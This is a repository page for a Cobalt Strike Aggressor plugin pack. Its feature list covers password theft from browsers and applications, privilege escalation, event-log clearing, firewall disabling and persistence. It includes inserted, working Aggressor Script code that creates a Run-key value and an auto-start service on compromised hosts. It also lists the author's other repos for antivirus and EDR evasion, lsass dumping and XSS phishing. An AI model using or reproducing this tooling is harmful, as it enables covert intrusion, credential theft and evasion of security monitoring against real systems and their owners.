  • Stars: 664
  • Rank: 67,903 (Top 2 %)
  • Language: C
  • Created about 5 years ago
  • Updated about 3 years ago


Repository Details

Cobalt Strike Aggressor plugin pack

Cobalt-Strike-Aggressor-Scripts

Apologies for the long gap without updates.

These scripts borrow ideas and source code from many experts; because they were put together in a hurry, not every source URL is listed. My thanks to all of them!

Usage: https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts/wiki

Update 20200422

Added the Info-Collect information-gathering module

Added Chrome password extraction

Update 20200317

Added spawn as wnf

Update 20200226

Added navicat decrypt

Fixed the WinSCP plaintext-password grabber dropping the last character

Update 20191231

Added a new local privilege-escalation method

Update 20191220

Bug fix: resolved a plugin conflict.

Update 20191219

The mshta reverse-shell method now supports .NET 4.0, for better compatibility with newer systems

Added password grabbing for several applications (right-click a session to see the menu)

Update 20191211

Added nbtscan one-click upload, scan and delete

Update 20191204

Added a persistence / autostart method

The initial beacon is automatically set to a 10-second sleep with 20% jitter

Added two privilege-escalation exploits

Added a sleep-with-jitter setting

On session check-in, the OS version is automatically added to the note

Added RDPthief

The ps command marks processes in different colours (for example, AV products are highlighted in red)
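What the 20191204 check-in behaviour above looks like in Aggressor Script (the sleep of 10 seconds with 20% jitter and the OS version written into the session note), as an added example; this is not code from the repo. It relies only on documented Cobalt Strike functions (the beacon_initial event, beacon_info, bnote and bsleep); the 10/20 values are the ones the changelog states.

```sleep
# Added example, not part of Cobalt-Strike-Aggressor-Scripts.
# Fires once per new Beacon check-in; $1 is the Beacon ID.
on beacon_initial {
    local('$bid $os $ver');
    $bid = $1;

    # Read OS name and version from the Beacon metadata and write them into
    # the session note, so they show in the session table without running
    # any command on the target.
    $os  = beacon_info($bid, "os");
    $ver = beacon_info($bid, "ver");
    bnote($bid, "$os $ver");

    # 10-second sleep with 20% jitter; the third argument is the jitter percentage.
    bsleep($bid, 10, 20);
}
```

Load it with the Script Manager like any other .cna; nothing is sent to the target except the sleep command, since beacon_info only reads what the teamserver already holds.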

When using the persistence plugin, it is recommended to change the registry value name and the service name inside the file (it also works unchanged).

Load Main.cna in the Cobalt Strike Script Manager.

Refactored version

Rewrote how the .cna files are invoked

Added some features

Modified the persistence plugin

Features:

Access->Elevate: added most of the usable privilege-escalation exploits

Attacks->Host CACTUSTORCH Payload: mshta and other callback methods can be added (requires an older .NET version)

The ps command marks processes in different colours (for example, antivirus processes are highlighted)

Session right-click menu:

MS17-010: adds the matching payload

Check-VM: checks whether the host is a virtual machine (requires PowerShell)

Clear-Event: clears the event logs

FireWall: disables the firewall, or allows a specific exe through it

Persistence: one of the most used features; sets persistence in several ways, with an exe or an mshta autostart

RDP: queries the RDP port and enables the RDP service

win2012mimikatz: modifies the registry so that logon passwords can be captured on Windows 2012 and later

CMD: batch-executes the configured system commands

sleep with jitter
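An added example of the session right-click menu pattern the feature list describes, not code from this repo: a "sleep with jitter" item, and a persistence item whose registry value name and service name are variables at the top of the file, following the README's advice to change those names before use. The placeholder names Updater and UpdaterSvc, the default executable path and the menu labels are assumptions; the HKCU Run key and sc.exe commands are standard Windows persistence, and the service item needs local administrator rights on the target.

```sleep
# Added example, not part of Cobalt-Strike-Aggressor-Scripts.

# Operator-configurable identifiers. Change these before use so the artifacts
# do not carry a public default name (the values below are assumed placeholders).
$persist_reg_name = "Updater";
$persist_svc_name = "UpdaterSvc";

# Entries under "popup beacon_bottom" appear in the session right-click menu;
# inside an item, $1 is the list of selected Beacon IDs.
popup beacon_bottom {
    menu "Examples" {
        item "Sleep with jitter" {
            local('$bids');
            $bids = $1;
            prompt_text("Sleep seconds and jitter percent (e.g. 60 20):", "60 20", lambda({
                local('$secs $jit $bid');
                # $1 here is the text the operator entered.
                ($secs, $jit) = split(' ', $1);
                foreach $bid ($bids) {
                    bsleep($bid, int($secs), int($jit));
                }
            }, \$bids));
        }

        item "Persist: Run key and service" {
            local('$bids');
            $bids = $1;
            prompt_text("Path of the executable already on the target:", 'C:\ProgramData\update.exe', lambda({
                local('$path $bid');
                $path = $1;
                foreach $bid ($bids) {
                    # Per-user autostart: HKCU Run value named from the variable above.
                    bshell($bid, 'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v '
                        . $persist_reg_name . ' /t REG_SZ /d "' . $path . '" /f');
                    # Auto-start service (requires local admin). sc.exe needs the
                    # space after "binPath=" and "start=".
                    bshell($bid, 'sc create ' . $persist_svc_name
                        . ' binPath= "' . $path . '" start= auto');
                }
            }, \$bids));
        }
    }
}
```

Both items act on every selected session. The single-quoted strings are used so that backslashes in the Windows paths are taken literally; `\$bids` shares the selected-session list with the prompt callback.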


etc

  1. Most of the open-source samples probably no longer evade AV; you will need to modify them yourself.

  2. I believe open-sourcing the core code helps people who want to learn.

  3. I have learned a lot from other people's projects on GitHub.

  4. If you use my projects for HW exercises / red-vs-blue engagements / APT / cybercrime / malicious or illegal activity / scams, I take no responsibility and it has nothing to do with me.

  5. I no longer take part on the attacking side of any HW activities, large or small; if an attack is traced back to the timwhite id, it is not me.

More Repositories

  1. crawlergo_x_XRAY: the 360/0Kee-Team/crawlergo dynamic crawler combined with the passive-scanning feature of Chaitin's (长亭) XRAY scanner (Python, 1,168 stars)
  2. Doge-Loader: 🐶Cobalt Strike Shellcode Loader by Golang (Go, 279 stars)
  3. Doge-Gabh: GetProcAddressByHash/remap/full dll unhooking/Tartaru's Gate/Spoofing Gate/universal/Perun's Fart/Spoofing-Gate/EGG/RecycledGate/syswhisper/RefleXXion golang implementation (Go, 271 stars)
  4. Doge-XSS-Phishing: XSS phishing; a cna plugin paired with a PHP backend that collects the catch (JavaScript, 266 stars)
  5. rad-xray: batch active scanning with xray + rad (Python, 217 stars)
  6. Frog-Auth: 🐸Unauthorized Detection Framework, a framework for detecting unauthenticated access (Python, 156 stars)
  7. Frog-checkCDN: batch-check whether targets sit behind a CDN (Python, 133 stars)
  8. Frog-Fp: 🐸fingerprint detect framework, a batch deep-fingerprinting framework (Python, 114 stars)
  9. Doge-Assembly: Golang evasion tool, execute-assembly .Net file (Go, 88 stars)
  10. Frog-Submon: 🐸Subdomain Monitor (Python, 75 stars)
  11. Doge-Defense-Evasion-Ref: Defense Evasion & Bypass AntiVirus reference (74 stars)
  12. ReturnGate: ReturnGate, just like HellsGate. (Go, 66 stars)
  13. killProcessPOC: use aswArPot.sys to kill process (Go, 62 stars)
  14. Doge-MemX: Golang implementation of Reflective load PE from memory (Go, 59 stars)
  15. doge-getsys: An easy way to getsystem by golang. (Go, 56 stars)
  16. Doge-sRDI: Shellcode implementation of Reflective DLL Injection by Golang. Convert DLLs to position independent shellcode (Go, 53 stars)
  17. Doge-Persistence-Platform: post-exploitation persistence control platform; Windows Persistence Platform (45 stars)
  18. Git-Daily: Github Security Daily Repository. (43 stars)
  19. Doge-CSBridge: CS http Dynamic Encrypt Bridge. (Go, 42 stars)
  20. Spoofing-Gate: (Hellsgate|Halosgate|Tartarosgate)+Spoofing-Gate. Ensures that all systemcalls go through ntdll.dll (Go, 41 stars)
  21. gobusterdns: lite version of gobuster. Only subdomain brute. A lightweight subdomain brute-forcing tool for internal networks (Go, 40 stars)
  22. Bof2PIC: BOF/COFF obj file to PIC(shellcode). by golang (C, 35 stars)
  23. memmod: Fork & modify of Wireguard's Memmod (Go, 32 stars)
  24. Doge-CLRLoad: load assembly executable file in memory (Go, 30 stars)
  25. Doge-ScreenShot: desktop screenshot (Go, 30 stars)
  26. about-anti-honeypot: some small statistical work on honeypots (JavaScript, 30 stars)
  27. Doge-AMSI-patch: golang amsi bypass (Go, 30 stars)
  28. Doge-DumpMem: dump lsass (Go, 30 stars)
  29. Doge-RecycledGate: Golang implementation of Hellsgate + Halosgate/Tartarosgate. Ensures that all systemcalls go through ntdll.dll; (Go, 29 stars)
  30. Doge-Hide: windows API to hide console window by golang (Go, 28 stars)
  31. Doge-Direct-Syscall: Golang Direct Syscall (Assembly, 28 stars)
  32. AddressOfEntryPoint-injection: x64 version (Go, 27 stars)
  33. Doge-SelfDelete: Golang implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs (Go, 26 stars)
  34. Doge-PX: DPX - the Doge Packer for eXecutables (Go, 26 stars)
  35. Doge-Process-Injection: Demo of process injection, using Nt, direct syscall, etc. (Go, 26 stars)
  36. ScareCrow-Common: ScareCrow loader binary source, easier to read and learn from (Go, 25 stars)
  37. iSliver: Learning notes on the amazing Sliver C2 project. (Go, 24 stars)
  38. Doge-Whisper: golang implementation of Syswhisper2/Syswhisper3 (Go, 23 stars)
  39. Doge-AliveCheck: Use ICMP requests to check which subnets are alive. (Go, 23 stars)
  40. Doge-newSyscall: use shellcode as asm function (Go, 22 stars)
  41. Doge-EGGCall: Like Hell's Gate but more EGG :) (Go, 21 stars)
  42. Doge-BlockDLLs: Preventing 3rd Party DLLs from Injecting into your Malware (Go, 21 stars)
  43. CLR-RWX: Load CLR to get RWX; obtain an RWX region in the process's own memory by loading the CLR (Go, 21 stars)
  44. Doge-RL: Reflective DLL injection Execution (Go, 20 stars)
  45. find-subdomain-by-xray: batch-collect subdomains using the xray advanced edition (Python, 19 stars)
  46. JmpUnhook: Ntdll Unhooking POC (Go, 18 stars)
  47. Doge-AddSSP: Load ssp dll golang implementation (Go, 17 stars)
  48. Cobalt-Strike-det: Cobalt Strike teamserver detection. (Python, 17 stars)
  49. Doge-HeapAlloc (Go, 15 stars)
  50. Doge-Misc: miscellaneous odds and ends (Go, 15 stars)
  51. Freeze-Common: Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods (Go, 14 stars)
  52. Doge-PX_GUI: DPX tool interface showcase (14 stars)
  53. Cafe: Programmer's guide about how to make drinks at home (Chinese only). (13 stars)
  54. Doge-Persist: Windows Persistence Collection (Go, 12 stars)
  55. Etwti-UnhookPOC: Etwti-UnhookPOC just for test (Go, 11 stars)
  56. Doge-Unhook: DLL Unhooking (Go, 11 stars)
  57. Doge-BadUSB: Open source! A self-designed BadUSB circuit board (10 stars)
  58. PyC2-demo: a product of "from getting started to giving up": basic single-node C2 functionality implemented in Python while learning (Python, 10 stars)
  59. sandbox-data-collection: cloud sandbox data collection (an ancient project from 2019 when I had just started learning Go; please don't judge) (Go, 10 stars)
  60. Go-VEH: VEH hook (Go, 10 stars)
  61. Divide-Conquer-demo: Divide and Conquer - A technique to bypass NextGen AV (Go, 9 stars)
  62. Doge-UnhookEtw: unhook etw by golang (Go, 9 stars)
  63. Doge-Obf: golang String Obfuscate (Go, 9 stars)
  64. Doge-WhereAmI: Golang implementation of boku7/whereami (Go, 8 stars)
  65. ice-strike-design: Ice-Strike C2 interface design showcase (8 stars)
  66. Doge-memLDR: memory dll loader (Go, 8 stars)
  67. Doge-FindFirewallPorts: Golang implementation of FindFirewallPorts by 清水川崎 (Go, 7 stars)
  68. Frog-CertDomain: Get CommonName and DNS domains from SSL cert. (Go, 7 stars)
  69. Doge-NpThief: Grab unsaved Notepad contents (Go, 7 stars)
  70. CVE-2018-8639-EXP: CVE-2018-8639-EXP (6 stars)
  71. Doge-RWXenum: Enumerating RWX Protected Memory Regions. (Go, 6 stars)
  72. Doge-OTP: Google Authenticator OTP (Go, 6 stars)
  73. Argue-like-Cobalt-Strike: Argue like Cobalt Strike (C++, 5 stars)
  74. Doge-hookbypass (C++, 5 stars)
  75. Doge-TypeUnhook: type ntdll.dll for dll unhooking (Go, 5 stars)
  76. Doge-ReMap: Unhook full dll by Section ReMap (Go, 5 stars)
  77. ACG-BOF: Preventing 3rd Party DLLs from Injecting into your Malware (C, 5 stars)
  78. fingerprint-scanner-research: a survey of open-source fingerprinting projects (5 stars)
  79. Mouse-Control: just for fun (Go, 4 stars)
  80. argument-spoofing: argue like Cobalt Strike (4 stars)
  81. VEH-FuncObf: function call Obfuscator using veh hook (C, 4 stars)
  82. timwhitez: about me (4 stars)
  83. Doge-ByteBinStr: Byte<->BinaryString convert (Go, 4 stars)
  84. powershell-killav: use ps1 to kill some antivirus (PowerShell, 3 stars)
  85. v4-v6: ipv4 address maps to ipv6 address (Go, 3 stars)
  86. useless-webshell: bigger than a one-line shell, smaller than a full-featured one; a so-called "medium" webshell (PHP, 3 stars)
  87. BinHol: Binary Hollowing (Go, 3 stars)
  88. Sub-Filter: filters the subdomains produced by brute-forcing (Python, 3 stars)
  89. LockWorkStation (Go, 2 stars)
  90. str2ntlm: string to ntlm hash string (Go, 2 stars)
  91. Garmin-Async: automatically syncs a Garmin China account with an international account on a schedule using dailysync.vyzt.dev (Go, 2 stars)
  92. AD-CoT: Advanced Dynamic Chain-of-Thought Framework Prompt (2 stars)
  93. zoomeye-search: import a list of domains and batch-query zoomeye (Python, 1 star)
  94. Sec_MindMap: some mind-map notes (1 star)
  95. META-ATT-CK-Framework: A comprehensive matrix of actionable offensive security techniques based on ATT&CK Framework (1 star)